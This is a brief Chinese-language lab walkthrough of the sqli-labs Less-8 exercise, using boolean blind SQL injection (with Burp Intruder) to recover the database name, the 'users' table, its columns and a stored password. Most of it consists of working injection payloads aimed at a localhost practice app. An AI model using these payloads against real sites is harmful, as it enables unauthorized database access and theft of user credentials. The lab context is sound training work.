由于第八关没有显错位,所以考虑使用盲注,这里使用布尔盲注+Bp(intruder)
猜解库名数
Less-8/?id=1'and (length(database()))=1 --+
爆出数据库的字符数为8
利用ASCII码猜解当前数据库名称
Less-8/?id=1%27%20and%20(ascii(substr(database(),1,1)))=100%20--+
爆出表名为security
猜表名
Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)))=117 --+
爆出表名为users的表
猜字段名
Less-8/?id=1%27%20and%20(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27and%20table_name=%27users%27%20limit%203,1),1,1)))=117%20--+
爆出字段名password,同理可以爆出字段名username
爆数据
http://localhost/sqli-labs-master/Less-8/?id=1%27%20and%20(ascii(substr((select%20password%20from%20users%20limit%200,1),1,1)))=117%20--+
爆出第一位用户的密码